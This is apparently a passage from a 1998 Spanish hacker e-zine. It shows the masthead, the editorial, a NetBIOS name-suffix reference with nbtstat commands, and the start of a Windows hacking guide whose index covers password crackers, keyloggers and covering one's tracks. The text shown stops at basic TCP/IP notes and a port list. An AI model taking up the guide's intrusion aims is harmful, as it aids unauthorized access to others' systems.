home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-05-27 | 329.7 KB | 9,059 lines |
- . . . . . . . . . . .
- . . . . . . . . .
- . . . . ▄ . █▄ . ▄ . █ . █ . . . . .
- . . █▄███▄█▄███▄▄████▄███▄████▄██▄ . .
- . . . │ ┌──────┐ │ . .
- . . . . │ │██████│ │ . .
- . . │ ┌──────┤██┌───┘ │ . .
- . . . │ ┌──────┤██████│██└─┐ │ . . .
- . . . . │ │██████├─┐██┌─┤████│ │ . .
- . │ └─┐██┌─┴┐│██│J│██┌─┘ │ . .
- . . . . . │ ┌──┐│██│██└┘██│J│██│ │ . . .
- . . │ │██└┘██│██████│F├──┘ │ . .
- . . │ │██████├──────┴─┘ │ . .
- . . . . │ └──────┘ │ . . .
- . . │ H A C K E R S T E A M │ . . . .
- . . │ J O U R N A L │
- . . . . ╠────────────────────────────╣ . . .
- ▄ ▄ ▄██ .█│ VOL. #2, Nº7, 1998. │ . ▄ █ .
- ██▄█▄██▄█▄▄██▄█████▄█▄██╚────────────────────────────╝█▄█▄▄▄███▄██▄██▄▄█▄██▄█▄
-
- IS COMPUTERWORLD TURNING HONEST CITIZENS INTO CRIMINALS?
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
- de la informacion aqui expuesta y tampoco tiene que estar
- de acuerdo con lo que sus colaboradores opinen.
- Tampoco esperamos que la gente use la informacion aqui expuesta
- para hacer daño ya que tan solo es con fines didacticos.
-
- Recomendado el uso del editor del MS-DOS.
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- #CURRENT MEMBERS :
-
- - CONDE VAMPIRO - CODER H/P/V EDITOR
- - MAC CRACK - CODER C/P WEBMASTER
- - Mr ELEKTRO - H/P ADMIN
- - TASSLEHOFF - CODER H CO-WEBMASTER
- - Dr BINIX - CODER H/P/V/C ADMIN
-
- #WEB OFICIAL :
-
- - http://www.jjf.org
-
- #E-MAIL OFICIAL :
-
- - team@jjf.org
-
- #LLAVE PGP OFICIAL :
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- - J.J.F. / Hackers Team -
- http://www.jjf.org
- Version: PGPfreeware 5.5.3i
-
- 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
- =HQVG
- -----END PGP PUBLIC KEY BLOCK-----
-
-
- #DISTRIBUIDORES OFICIALES DEL E-ZINE :
-
- - http://wakanda.islatortuga.com
- - http://underhack.islatortuga.com
- - http://personal.redestb.es/cheroky-1
- - http://members.xoom.com/baron_rojo/
- - http://members.xoom.com/rifoxxx
- - http://www.bigfoot.com/~u_taker
- - http://phucksys.dyn.ml.org
- - http://www.bigfoot.com/~proyecto_r
- - http://members.xoom.com/zine_store/
- - http://visitweb.com/disciples
-
- #MIEMBRO OFICIAL (web ring) DE :
-
- - Black Angels
- - Spanish Underground Web Ring
-
- #COLABORADORES CON ESTE NUMERO :
-
- - {CyBoRg} (SHG Security)
- - EiVoL (Hack Trax & HoLoCaUsTo)
- - Bisho
- - PoSiDoN
- - Nobody
-
- #SALUDOS :
-
- - Metalslug (Wakanda) - NeonSurge (Rhino9)
- - Schoddy Guy (Underhack) - L0pth
- - Cheroky - Ivan Arce (CORE SDI S.A.)
- - Silicon Dragon - Proyecto R
- - Paseante (SET) - SHG Security
- - Dr Slump (oioio)
-
- <────────────────────────────────────────────────────────────────────────────>
- <────────────────────────────────────────────────────────────────────────────>
- <────────────────────────────────────────────────────────────────────────────>
-
- - INDICE.
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * SIGNIFICADO DE NETBIOS ................... {CYBORG}.
- * LA SUPER GUIA DEL HACKER
- VERSION DELUXE ........................... NOBODY.
- * CYBERANGEL: UN PROGRAMA, UN
- PASSWORD, UN MONTON DE SEGURIDAD ......... MAC CRACK & TASSLEHOFF.
- * CURSO DE HACK VII ........................ CONDE VAMPIRO.
- * TROYANOS EN LINUX ........................ POSIDON.
- * TODO (O CASI TODO) SOBRE
- El SMURFING V1.0 ......................... MAC CRACK.
- * UTILIDADES DCL PARA EL HACKER DE VMS ..... EIVOL.
- * QUE ES UN HACKER ......................... TASSLEHOFF.
- * CONSEAL PC FIREWALL BUG .................. BISHO.
- * EL LECTOR OPINA .......................... VARIOS.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- -------------
- │ EDITORIAL │
- -------------
-
- Bueno chicos, tras un largo periodo hemos vuelto como siempre, pero
- esta vez tenemos buenos motivos para a ver sacado este numero en esta fecha
- concreta, pues resulta que cumplimos 1 AñO de revista :)))) Quien lo diria,
- cuando empezamos esta loca odisea, algunos nos criticaron pero poco a
- poco hemos demostrado que estamos a la altura de cualquier ezine. Decir
- que este esfuerzo a sido gracias a muy pocos, ya que todavia necesitamos
- que la gente escriba articulos, ya que si no no haremos gran cosa, pero en
- fin seguiremos como siempre.
-
- Como haveis podido comprobar, estamos muy activos ya que ahora tenemos
- domimo propio :) hemos comenzado la distribucion de nuestros "white papers"
- conocidos como - J.J.F. / Hackers Team - Security Documentation, tambien
- estamos distribuyendo nuestro software de seguridad y llevando un equipo
- de voluntarios para participar en el concurso internacional de RC5,
- conocido como JJF RC5 Crack Team, en el cual esperamos que todos vosotros
- que nos leeis, os apunteis :))
-
- Estad atentos a todos los cambios que se han producido en
- - J.J.F. / Hackers Team -, los cuales han sido muchos, como TODAS NUESTRAS
- DIRECCIONES DE CORREO ademas de NUESTRA NUEVA LLAVE PGP. Por lo que para
- poneros en contacto con nosotros debeis usar las nuevas direcciones.
-
- Por otro lado, tenemos un nuevo miembro en nuestras filas, Dr Binix al
- cual le damos la bienvenida en - J.J.F. / Hackers Team -. Tambien tenemos 3
- distribuidores mas que son los siguientes http://www.bigfoot.com/~u_taker
- llevado por TAkER y el otro es http://phucksys.dyn.ml.org llevado por
- GabberMan, y por ultimo el website http://members.xoom.com/zine_store/
- llevado por MAU, el siguiente es http://visitweb.com/disciples llevado por
- Avathar.
-
- Como vereis muchas cosas han cambiado, nos hemos vuelto mas abiertos,
- en el sentido del website, ya que nuestra intencion no es inducir a la
- delincuenia sino todo lo contrario, ayudar a mejorar la seguridad y ayudar
- a los admin's a que conozcan los peligros pero tambien sin olvidarnos
- todas esas personas que quieren ser hackers, o sea nuestros fieles lectores.
- En nuestro nuevo domino notareis muchos cambios que seguro que os seran
- muy gratos y recomendamos leer nuestro FAQ, el cual os resolvera todas
- las dudas que tengais.
-
- Para cualquier articulo, duda, consulta sobre el ezine, simplemente
- debeis escribir a nuestro buzon de mail:
-
- editor@jjf.org
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- /----------------------\
- - SIGNIFICADO DE NETBIOS -
- \----------------------/
-
- Bueno os mando algo sobre netbios, espero que os guste.
-
- Vamos a ver por donde empezamos, cuantas veces habeis echo un nbtstat
- y os han salido un monton de cosas y no sabeis el significado de ellas,
- solo con saber si hay un <20> os basta, pero esto no es asi, hay que saber
- el porque de cada cosa. Asi que en este texto os explicare que significa
- cada cosa rara que sale.
-
- Los nombres de NETBIOS pueden tener una loguitud de 16 caracteres y
- el caracter 16th es especial que es usado por los servicios de red de
- microsoft.
-
- Hay dos tipos en un entorno NetBIOS, Unique (unico) y Group (Grupo).
- Un nombre unique deber ser unico en la red, mientras que un nombre Group no
- tiene porque ser unico y todos los procesos que tiene un determinado grupo,
- pertenecen al grupo. Cada nodo NetBIOS mantiene una tabla de todos los
- nombres actuales en el nodo. La siguiente tabla de NetBIOS, muestra los
- poxibles subfijos en hexadecimal.
-
- Name Number Type Usage
-
- <computername> 00 U Workstation Service
- <computername> 01 U Messenger Service
- <\\_MSBROWSE_> 01 G Master Browser
- <computername> 03 U Messenger Service
- <computername> 06 U RAS Server Service
- <computername> 1F U NetDDE Service
- <computername> 20 U File Server Service
- <computername> 21 U RAS Client Service
- <computername> 22 U Exchange Interchange
- <computername> 23 U Exchange Store
- <computername> 24 U Exchange Directory
- <computername> 30 U Modem Sharing Server Service
- <computername> 31 U Modem Sharing Client Service
- <computername> 43 U SMS Client Remote Control
- <computername> 44 U SMS Admin Remote Control Tool
- <computername> 45 U SMS Client Remote Chat
- <computername> 46 U SMS Client Remote Transfer
- <computername> 4C U DEC Pathworks TCPIP Service
- <computername> 52 U DEC Pathworks TCPIP Service
- <computername> 87 U Exchange MTA
- <computername> 6A U Exchange IMC
- <computername> BE U Network Monitor Agent
- <computername> BF U Network Monitor Apps
- <username> 03 U Messenger Service
- <domain> 00 G Domain Name
- <domain> 1B U Domain Master Browser
- <domain> 1C G Domain Controllers
- <domain> 1D U Master Browser
- <domain> 1E G Browser Service Elections
- <INet~Services> 1C G Internet Information Server
- <IS~Computer_name> 00 U Internet Information Server
- <computername> [2B] U Lotus Notes Server
- IRISMULTICAST [2F] G Lotus Notes
- IRISNAMESERVER [33] G Lotus Notes
- Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
-
- Unique (U) .- Debe tener solamente una IP asignada.
- Group (G) .- El nombre unico debe existir con varias direcciones IP.
- Multihomed (M) .- El nombre es unico, pero debido a varias tarjetas de red
- en el mismo ordenador, se le permite en la registracion.
- Numero maximo de direcciones es 25.
- Internet Group (I) .- Configuracion especial del grupo, nombre usado por el
- nombre de dominios de WINNT.
- Domain Name (D) .- Esto es nuevo en NT 4.0. Nombre del dominio.
-
- 1.- TIPO UNIQUE significado del 16th:
-
- <00> Nombre del servicio de la estacion de trabajo, este es el nombre
- al que se refiere el nombre del NETBIOS.
-
- <03> Nombre del servico de mensajeria, es usado cuando recibimos o
- emviamos mensajes. Este nombre esta registrado con el servidor WINS.
-
- <1B> Nombre del Dominio Principal. Identifica al primer contralador de
- Dominio.
-
- <06> Servicio de servidor RAS.
-
- <1F> Servicio NetDDE.
-
- <20> Nombre del servicio servidor, nos indica que hay algo compartido.
-
- <21> Cliente RAS.
-
- <BE> Monitor de agente de red.
-
- <BF> Utilidad de monitor de red.
-
- 2.- TIPO GROUP significado del 16th:
-
- <1C> Nombre del grupo de dominio. Contiene la lista de dirreciones los
- equipos que estan registrados en el dominio.
-
- <1D> Nombre del master Browser, es usado por los equipos clientes para
- acceder a =e9l.
-
- <1E> Nombre de un grupo normal.
-
- <20> Nombre de un grupo especial, llamado grupo de internet que es
- registrado con un servidor de WINS que identifica grupos de equipos con
- fines administrativos.
-
- _MSBROWSE_ Va en relacion con el nombre del Dominio.
-
- Para un rapido testeo de todo esto, se pueden utilizar los siguientes
- comandos desde una ventana de MS-DOS:
-
- nbtstat -A direccion IP
- nbtstat -a Host
-
- Las sesiones NetBIOS son bidireccionales, requiere un proceso de
- cliente y otro de servidor, es decir, requiere la cooperacion de 2
- ordenadores. La mayoria de NetBIOS implementada para TCP/IP lleva a cabo
- una resolucion de nombres pero usando cualquier broadcast o fichero LMHOSTS.
- Cuando NetBIOS esta sobre TCP/IP se le conoce como modulo NBT.
-
- Tambien tenemos el SMB (Servidor Mensajes Bloque), es un tipo de
- protocolo de mensajeria en una LAN entre clientes y servidores, que se usa
- para comunicarse entre ellos. El SMB es un protocolo de nivel superior que
- puede ser transportado sobre NetBEUI, NetBIOS sobre IPX y NBT. SMB es usado
- por Windows 3.x, Win95, WinNT y OS/2. Permite acceder a directorios
- remotamente.
-
- Texto escrito por: {CyBoRg}
- SHG Security
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
- 02-11-1998.
- ??????
- ░▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░
- ░▒╔═════════════════════════════╗▒░
- ░▒║┌ LA SUPER GUIA DEL HACKER ┐║▒░
- ░▒║│╔═════════════════════════╗│║▒░
- ░▒║│╚═════════════════════════╝│║▒░
- ░▒║└ by Nobody ┘║▒░
- ░▒╚═════════════════════════════╝▒░
- ░▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░▒▓▒░
-
- <<<<<<<<<<VERSION DELUXE>>>>>>>>>>>
-
- ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
-
- Nota Del Autor: No me hago responsable de la mala utilizacion de la
- informacion aqui expuesta ya que tan solo es para fines
- didacticos.
- Esta guia es de distribucion libre excepto para las
- instituciones gubernamentales que deberan abonar 2000 pts
- a alguna fundacion para apadrinar niños.
-
- ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
-
- - INDICE:
-
- 1 ......................... Que Es Esta Guia Exactamente ?
- 2 ......................... Descripcion General De Windows.
- 2-1 ...................... Seguridad En Windows.
- 3 ......................... Protocolo TCP/IP y Demas Historias.
- 3-1....................... Puertos.
- 3-2....................... Ftp.
- 3-3....................... Telnet.
- 4 ......................... Hacking Basico En Windows.
- 4-1 ...................... Phf.
- 4-2 ...................... Ftp.
- 4-3 ...................... Ping De La Muerte.
- 4-4 ...................... Recursos Compartidos.
- 4-5 ...................... Fake Mail Con El Telnet.
- 4-6 ...................... Cambiando El Entorno.
- 4-7 ...................... Finger.
- 4-8 ...................... Whois.
- 4-9 ...................... Tracert.
- 4-10 ..................... Winipcfg.
- 4-11 ..................... Ipconfig.
- 4-12 ..................... Arp.
- 4-13 ..................... Route.
- 4-14 ..................... Netstat.
- 5 ......................... Utilizacion De Tools.
- 5-1 ...................... SkamWerks Lab version 1.1b.
- 5-2 ...................... WaReZ! Version 95.12.31.
- 5-3 ...................... John the Ripper v1.4.
- 5-4 ...................... Gobbler v 2.1.
- 5-5 ...................... Sharepasswd.
- 5-6 ...................... Snadboy's Revelation v1.1.
- 5-7 ...................... Keylog95.
- 5-8 ...................... Glide.
- 5-9 ...................... Win95 AnonyMail v 1.0.
- 5-10 ..................... Hacker's Utility, V 1.02.
- 5-11 ..................... Haktek v1.1.
- 5-12 ..................... Claymore Brute Force.
- 5-13 ..................... Skream's Port Listener V 2.3.
- 5-14 ..................... WSOCK32 Winsock Spy Facility Version .91
- 5-15 ..................... PWlTool V 4.0.
- 5-16 ..................... PwlView V 1.01.
- 6 ......................... Medidas De Seguridad.
- 6-1 ...................... Protegiendo Nuestro Ordenador.
- 6-1 ..................... Ataques Tipicos a Nuestro Windows.
- 6-2 ..................... Encriptacion De Nuestra Informacion.
- 6-3 ..................... Eliminar Informacion De Forma Segura.
- 6-4 ..................... Eliminacion De Virus.
- 6-1-1 .................... Protegiendo Nuestras Acciones.
- 6-1-1-1 ................. Borrando Nuestras Huellas.
- 6-1-1-2 ................. Encriptando Nuestro Correo.
- 7 ......................... Sugerencias Para Un Mejor Hacking.
- 8 ......................... Obtener Informacion.
- 9 ......................... Despedida.
- 9-1 ...................... Agradecimientos.
-
- ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
-
- 1. Que Es Esta Guia Exactamente ?
-
- Esta guia esta enfocado hacia todo aquel que quiere ser hacker pero no
- quiere aprender unix o no lo sabe manejar (grave error). Pues por esta
- razon esta guia esta enfocada a los usuarios de windows, principalmente
- los de win95/98. Por el contrario esta guia no se dedicara al NT o Unix,
- aunque por supuesto se hara referencia a estos sistemas sobre todo cuando
- son estos mismos Sistemas Operativos en los cuales se centraran nuestros
- actos, supuestamente legales :)
-
- Todo esto que digo puede sonar tonterias y puedes pensar que en win95/98 no
- podras llegar a ser un gran hacker porque es necesario conocer unix, y
- estoy totalmente de acuerdo, pero solo pretendo dar una oportunidad para
- hacer sus pinitos a aquellos que solo saber usar win95/98, yo por mi parte
- aconsejo aprender unix por varias razones que no viene a cuento en esta
- guia.
-
- Con esta guia te convertiras en un magnifico Hacker usando un sistema que
- no es propenso al hacking. Como es normal al usar win95/98 estaremos muy
- limitados en muchos aspectos pero podras aprender por ejemplo, algunos
- bug que podras usar en tu favor, la utilizacion de diversas herramientas
- hacker que no estan disponibles generalemente en win95/98 y ademas a usar
- los recursos que te ofrece Internet en tu favor, abreviando un poco tanta
- charla, llegaras a conocer la red de una forma diferente y a manejar
- win95/98 de forma distinta a lo conocido hasta ahora.
-
- Esta es la version Deluxe, de mi conocida guia LA SUPER GUIA DEL HACKER, la
- cual a sido revisada y actualizada, algunas herramientas como el Bo o Netbus
- no seran explicadas debido a que son realmente faciles de usar y ademas
- disponen de gran variedad de opciones y me saldria un documento monstruoso.
- Al igual que me he dejado muchas cosas, que a lo mejor gustaria que
- explicara pero realmente es imposible explicarlo todo, ademas el espiritu
- hacker es aquella persona que simplemente quiere conocer pero debe
- investigar por si misma, de nada sirve que este todo hecho. Por eso os digo:
-
- "Si juegas a Hacker, piensa como un Hacker."
-
- Surfeando por Internet, he encontrado esta guia pasada a HTML y lo
- mas curioso es que han quitado mi nick del documento (que raro };-), pues
- para estos plagiadores, aqui teneis la version Deluxe para que la volvais
- a copiar!!!!!
-
- 2. Descripcion General De Windows.
-
- Como todos sabemos el windows95/98 es un popular sistema operativo de la
- casa Microsoft, el cual es conocido tanto por sus adepto ya que es muy
- sencillo y vistoso pero al igual tambien es muy conocido por su inseguridad
- en casi todos sus aspectos, ademas no ofrece tanta versativilidad como otros
- sistemas operativos. Por ejemplo este es el caso de su "Multitarea" la cual
- es virtual y no real, si quieres hacer la prueba pon en marcha el defrag y
- ejecuta otro programa :) y veras esa famosa Multitarea.
-
- El win95/98 es un sistema operativo de 32 bits multitarea, que es muy comodo
- para la gente que busca facilidad, pero no te engañes pensando que es un
- sistema ideal para Internet, puede que para un usuario convencional le sea
- estupendo pero para un Hacker se queda muy corto de calle, ya que le falta
- muchos servicios que otros sistemas operativos si traen como el que ya
- tantas veces he repetido, el Unix (se nota que me encanta??:).
-
- Aqui os dejo de dar la murga sobre win95/98 ya que este texto no esta
- destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no
- creo que este contando nada nuevo sobre windows o sea que mejor me callo y
- si no sabes mucho sobre win95/98, pues ya sabes comprate un libro.
-
- 2-1. Seguridad En Windows.
-
- Como todos sabemos la seguridad en win95/98 es nula, es decir, win95/98 no
- tiene seguridad por si mismo, un claro ejemplo de esto que es las ventanas
- que nos piden un password las podemos cerrar pulsando sobre la X o tambien
- nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana
- sin meter ningun password.
-
- Por eso para que nuestro ventanas (nombre que se le da a win95/98 :)
- tendremos que instalarle algun paquete de seguridad disponible por la red,
- que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque
- siempre puedes comprar algun paquete comercial de seguridad, en mi opinion
- alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y
- cuando llega la oportunidad de demostrar su calidad nos falla, ya que no
- hay nada seguro 100%.
-
- Proteger nuestro win95/98 es cosa de cada uno pero tranquilidad, que la cosa
- no es muy dificil, es cuestion de estar atento a las novedades, en otras
- palabras estar informado. Mas abajo ya te entereras de estas cosas.
-
- 3. Protocolo TCP/IP y Demas Historias.
-
- El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que
- engloba casi todos los servicios que solemos usar como por ejemplo cuando
- hacemos telnet, mail, ftp o cualquier cosa.
-
- TCP/IP proviene de Transmission Control Protocol y Internet Protocol
- respectivamente. Por fortuna para los usuarios de win95/98, este protocolo
- ya viene incorporado nativamente en el sistema, al contrario que ocurria
- con el windows 3.x, el cual lo teniamos que instalar para poder conectar
- a Internet.
-
- Como has podido comprobar en realidad son 2 protocolos pero que estan
- unidos, el primero o sea el TCP es el encargado de las comunicaciones y de
- la transmision de los paquetes cuando estamos conectados a un servidor. El
- IP es el encargado de que los paquetes llegen a destino por orden aunque
- tomen caminos diferentes.
-
- * Diagrama del TCP *
-
- cliente -> El cliente le envia una -> servidor
- solicitud de conexion
- espeficicando el puerto
- de conexion al servidor.
-
- cliente <- El servidor le responde <- servidor
- que conoce su peticion
- de conexion.
-
- cliente -> El cliente le devuelve <- servidor
- otra vez la peticion y
- el circuito ya esta
- abierto.
-
- * Diagrama del IP *
-
- │Informacion general│Direccion IP│Direccion IP│Datos│
- │de cabezera. │de origen │de destino. │ │
-
- Pues aqui se acaba la explicacion basica de este protocolo, para el que
- este interesado en profundizar le remito a que se pille el RFC 1180 o un
- fichero disponible en multitud de servidores, desgraciadamente no te puede
- asegurar el nombre del fichero ya que lo he encontrado de varias formas
- pero te dare el nombre que aparece al editarlo, ya que en todos es igual:
-
- Introduction
- to
- the Internet Protocols
-
- C R
-
- C S
- Computer Science Facilities Group
- C I
-
- L S
-
- RUTGERS
- The State University of New Jersey
-
- 3 July 1987
-
- 3-1. Puertos
-
- Antes ya os he explicado muy brevemente la comunicacion del protocolo en
- cuestion. Pues ahora os pongo una extensa lista sobre los distintos
- puertos y sus servicios correspondientes.
-
- echo 7/tcp
- echo 7/udp
- discard 9/tcp sink null
- discard 9/udp sink null
- systat 11/tcp
- systat 11/tcp users
- daytime 13/tcp
- daytime 13/udp
- netstat 15/tcp
- qotd 17/tcp quote
- qotd 17/udp quote
- chargen 19/tcp ttytst source
- chargen 19/udp ttytst source
- ftp-data 20/tcp
- ftp 21/tcp
- telnet 23/tcp
- smtp 25/tcp mail
- time 37/tcp timserver
- time 37/udp timserver
- rlp 39/udp resource # resource location
- name 42/tcp nameserver
- name 42/udp nameserver
- whois 43/tcp nicname # usually to sri-nic
- domain 53/tcp nameserver # name-domain server
- domain 53/udp nameserver
- nameserver 53/tcp domain # name-domain server
- nameserver 53/udp domain
- mtp 57/tcp # deprecated
- bootp 67/udp # boot program server
- tftp 69/udp
- rje 77/tcp netrjs
- finger 79/tcp
- link 87/tcp ttylink
- supdup 95/tcp
- hostnames 101/tcp hostname # usually from sri-nic
- iso-tsap 102/tcp
- dictionary 103/tcp webster
- x400 103/tcp # ISO Mail
- x400-snd 104/tcp
- csnet-ns 105/tcp
- pop 109/tcp postoffice
- pop2 109/tcp # Post Office
- pop3 110/tcp postoffice
- portmap 111/tcp
- portmap 111/udp
- sunrpc 111/tcp
- sunrpc 111/udp
- auth 113/tcp authentication
- sftp 115/tcp
- path 117/tcp
- uucp-path 117/tcp
- nntp 119/tcp usenet # Network News Transfer
- ntp 123/udp ntpd ntp # network time protocol (exp)
- nbname 137/udp
- nbdatagram 138/udp
- nbsession 139/tcp
- NeWS 144/tcp news
- sgmp 153/udp sgmp
- tcprepo 158/tcp repository # PCMAIL
- snmp 161/udp snmp
- snmp-trap 162/udp snmp
- print-srv 170/tcp # network PostScript
- vmnet 175/tcp
- load 315/udp
- vmnet0 400/tcp
- sytek 500/udp
- biff 512/udp comsat
- exec 512/tcp
- login 513/tcp
- who 513/udp whod
- shell 514/tcp cmd # no passwords used
- syslog 514/udp
- printer 515/tcp spooler # line printer spooler
- talk 517/udp
- ntalk 518/udp
- efs 520/tcp # for LucasFilm
- route 520/udp router routed
- timed 525/udp timeserver
- tempo 526/tcp newdate
- courier 530/tcp rpc
- conference 531/tcp chat
- rvd-control 531/udp MIT disk
- netnews 532/tcp readnews
- netwall 533/udp # -for emergency broadcasts
- uucp 540/tcp uucpd # uucp daemon
- klogin 543/tcp # Kerberos authenticated rlogin
- kshell 544/tcp cmd # and remote shell
- new-rwho 550/udp new-who # experimental
- remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem
- rmonitor 560/udp rmonitord # experimental
- monitor 561/udp # experimental
- garcon 600/tcp
- maitrd 601/tcp
- busboy 602/tcp
- acctmaster 700/udp
- acctslave 701/udp
- acct 702/udp
- acctlogin 703/udp
- acctprinter 704/udp
- elcsd 704/udp # errlog
- acctinfo 705/udp
- acctslave2 706/udp
- acctdisk 707/udp
- kerberos 750/tcp kdc # Kerberos authentication--tcp
- kerberos 750/udp kdc # Kerberos authentication--udp
- kerberos_master 751/tcp # Kerberos authentication
- kerberos_master 751/udp # Kerberos authentication
- passwd_server 752/udp # Kerberos passwd server
- userreg_server 753/udp # Kerberos userreg server
- krb_prop 754/tcp # Kerberos slave propagation
- erlogin 888/tcp # Login and environment passing
- kpop 1109/tcp # Pop with Kerberos
- phone 1167/udp
- ingreslock 1524/tcp
- maze 1666/udp
- nfs 2049/udp # sun nfs
- knetd 2053/tcp # Kerberos de-multiplexor
- eklogin 2105/tcp # Kerberos encrypted rlogin
- rmt 5555/tcp rmtd
- mtb 5556/tcp mtbd # mtb backup
- man 9535/tcp # remote man server
- w 9536/tcp
- mantst 9537/tcp # remote man server, testing
- bnews 10000/tcp
- rscs0 10000/udp
- queue 10001/tcp
- rscs1 10001/udp
- poker 10002/tcp
- rscs2 10002/udp
- gateway 10003/tcp
- rscs3 10003/udp
- remp 10004/tcp
- rscs4 10004/udp
- rscs5 10005/udp
- rscs6 10006/udp
- rscs7 10007/udp
- rscs8 10008/udp
- rscs9 10009/udp
- rscsa 10010/udp
- rscsb 10011/udp
- qmaster 10012/tcp
- qmaster 10012/udp
-
- La verdad es que no te quejaras :) de esta lista. Si quieres mas
- informacion sobre los puertos con su debida explicacion mirate el RFC 1060.
-
- 3-2. Ftp.
